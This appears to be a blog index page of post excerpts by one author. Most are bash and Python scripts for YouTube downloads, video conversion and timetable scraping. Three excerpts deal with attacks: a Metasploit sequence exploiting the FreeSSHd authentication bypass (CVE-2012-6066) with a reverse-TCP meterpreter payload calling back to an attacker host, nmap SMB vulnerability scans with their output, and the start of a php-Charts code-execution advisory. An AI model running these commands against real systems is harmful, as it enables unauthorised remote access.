CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo

use auxiliary/scanner/ssh/ssh_version set RHOSTS 192.168.178.22 run use exploit/windows/ssh/freesshd_authbypass set RHOST 192.168.178.22 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo ...

Posted by
jay

More

Nmap & Metasploit Exploit

nmap --script smb-check-vulns.nse -p445 <host> sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host> Script Output Host script results: | smb-check-vulns: | MS08-067: VULNERABLE | regsvc DoS: regsvc DoS: VULNERABLE | SMBv2 DoS (CVE-2009-3103): VULNERABLE | MS06-025: NO SERVICE (the Ras RPC service is inactive) |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive) $...

Posted by
jay

More

Downloading Youtube Music from .FLV and converting to .mp3

#!/bin/bash echo Enter the youtube url to begin downloading the video. read VIDEO echo What is the artist of the song? read ARTIST echo What is the name of the song? read NAME youtube-dl $VIDEO -o "${ARTIST} - ${NAME}.flv" ffmpeg -i "${ARTIST} - ${NAME}.flv" -acodec libmp3lame -ac 2 -ab 128 -vn -y "${ARTIST} - ${NAME}.mp3" rm -rf "${ARTIST} - ${NAME}.flv" echo Your video is finally converted into a mp3! ##CHEERS! ...

Posted by
jay

More

Downloading Youtube Playlist

# On Ubuntu Linux terminal key in. $ apt-get update && apt-get youtube-dl -y $ ./youtube-dl -cit "[youtube playliste without the square bracket]" # Enjoy ;...

Posted by
jay

More

Bash Script Conversion from .avi to .mpg

#!/bin/bash #This script is to lower the quality to save memory to watch movie / drama on your mobile. for i in $(ls -1 *.avi); do echo item: $i ffmpeg -i $i -b 200k $i.mpg do...

Posted by
jay

More

Webspace Scheduler in Python

#! /usr/bin/python # install mechanize and BeautifulSoup var = raw_input("Enter Your Intake Code: ") import urllib, urllib2, cookielib import mechanize import re import sys from BeautifulSoup import BeautifulSoup reload(sys) br = mechanize.Browser() getweb=br.open('http://webspace.apiit.edu.my/intake-timetable/').read() getwebspace = BeautifulSoup(getweb) scrapDate = re.compile('[0-9-]+.xml') listdate...

Posted by
jay

More

php-Charts Arbitrary PHP Code Execution Vulnerability

=============================================================== Vulnerable Software: php-chart_v1.0 Official Site: http://php-charts.com/ Vuln: PHP Code Execution. =============================================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59) Copyright...

Posted by
jay

More
Powered by Blogger.